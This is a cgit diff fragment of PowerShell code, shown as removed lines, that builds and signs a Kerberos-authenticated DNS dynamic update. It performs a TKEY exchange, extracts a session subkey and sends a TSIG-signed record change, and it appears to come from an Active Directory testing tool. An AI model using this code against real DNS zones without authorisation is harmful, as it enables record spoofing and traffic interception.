- $DNS_client_stream.Flush()
- $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
- $tkey_payload = [System.BitConverter]::ToString($DNS_client_receive)
- $tkey_payload = $tkey_payload -replace "-",""
-
- if($tkey_payload.Substring(8,4) -eq '8000')
- {
- Write-Verbose "[+] Kerberos TKEY query successful"
- $TKEY_success = $true
- }
- else
- {
- Write-Output ("[-] Kerberos TKEY query error 0x" + $tkey_payload.Substring(8,4))
- $TKEY_success = $false
- }
-
- if($TKEY_success)
- {
-
- if($kerberos_tcpclient)
- {
- $cipher_index = $tkey_payload.IndexOf("A003020112A2")
- $cipher_length = $DNS_client_receive[($cipher_index / 2 + 8)]
- $cipher = $DNS_client_receive[($cipher_index / 2 + 9)..($cipher_index / 2 + 8 + $cipher_length)]
- $ke_key = Get-KerberosAES256UsageKey encrypt 12 $kerberos_session_key
- $tkey_cleartext = Unprotect-KerberosASREP $ke_key $cipher[0..($cipher.Count - 13)]
- $acceptor_subkey = $tkey_cleartext[59..90]
- }
- else
- {
- $sequence_index = $tkey_payload.IndexOf("FFFFFFFFFF00000000")
- $sequence_number = $DNS_client_receive[($sequence_index / 2 + 9)..($sequence_index / 2 + 12)]
- $acceptor_subkey = $asrep_key
- }
-
- $kc_key = Get-KerberosAES256UsageKey checksum 25 $acceptor_subkey
- $time_signed = [Int](([DateTime]::UtcNow)-(Get-Date "1/1/1970")).TotalSeconds
- $time_signed = [System.BitConverter]::GetBytes($time_signed)
- $time_signed = 0x00,0x00 + $time_signed[3..0]
- [Byte[]]$transaction_id = New-RandomByteArray 2
- $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData $time_signed $tkey_name
- [Byte[]]$DNSUpdateTSIG = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
- $packet_DNSUpdateMAC = New-PacketDNSUpdateMAC $mac_flags $sequence_number
- [Byte[]]$DNSUpdateMAC = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdateMAC
- $DNSUpdateTSIG += $DNSUpdateMAC
- $checksum = Get-KerberosHMACSHA1 $kc_key $DNSUpdateTSIG
- $packet_DNSUpdateMAC = New-PacketDNSUpdateMAC $mac_flags $sequence_number $checksum
- [Byte[]]$DNSUpdateMAC = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdateMAC
- $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData $time_signed $tkey_name $DNSUpdateMAC
- [Byte[]]$DNSUpdateTSIG = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
- $DNS_client_send = $DNSUpdateTSIG
- $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
- $DNS_client_stream.Flush()
- $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
- $DNS_update_response_status = Get-DNSUpdateResponseStatus $DNS_client_receive
- Write-Output $DNS_update_response_status
- $DNS_client.Close()
- $DNS_client_stream.Close()
- }
-
- }
-
- }
-
- }
-
- }
-
-}
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-25 19:50:53 +0000